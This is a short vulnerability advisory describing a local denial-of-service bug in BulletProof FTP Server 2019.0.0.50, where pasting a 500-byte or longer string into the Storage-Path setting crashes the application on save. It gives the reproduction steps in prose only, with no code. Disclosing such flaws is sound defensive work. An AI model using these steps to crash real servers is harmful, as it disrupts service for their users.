BulletProof FTP Server Denial-of-Service Vulnerability in Storage-Path Configuration
Vulnerability
A denial-of-service vulnerability has been identified in BulletProof FTP Server version 2019.0.0.50. The issue arises in the Storage-Path configuration parameter, where local attackers can cause the application to crash by inputting an excessively long string. By enabling the Override Storage-Path setting and pasting a buffer of 500 bytes or more, the application fails when attempting to save the configuration.
Impact
Exploiting this vulnerability leads to a crash of the BulletProof FTP Server application, causing a denial-of-service condition.
Reproduction
The vulnerability can be reproduced by running a Python script that generates a 500-byte buffer, which is then copied to the clipboard. After opening BulletProof FTP Server and navigating to the 'Settings' > 'Advanced' menu, the Override Storage-Path option can be enabled. The clipboard content is then pasted into the Storage-Path field, and clicking 'Save' triggers the application to crash.
Vulnerability Rating
Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.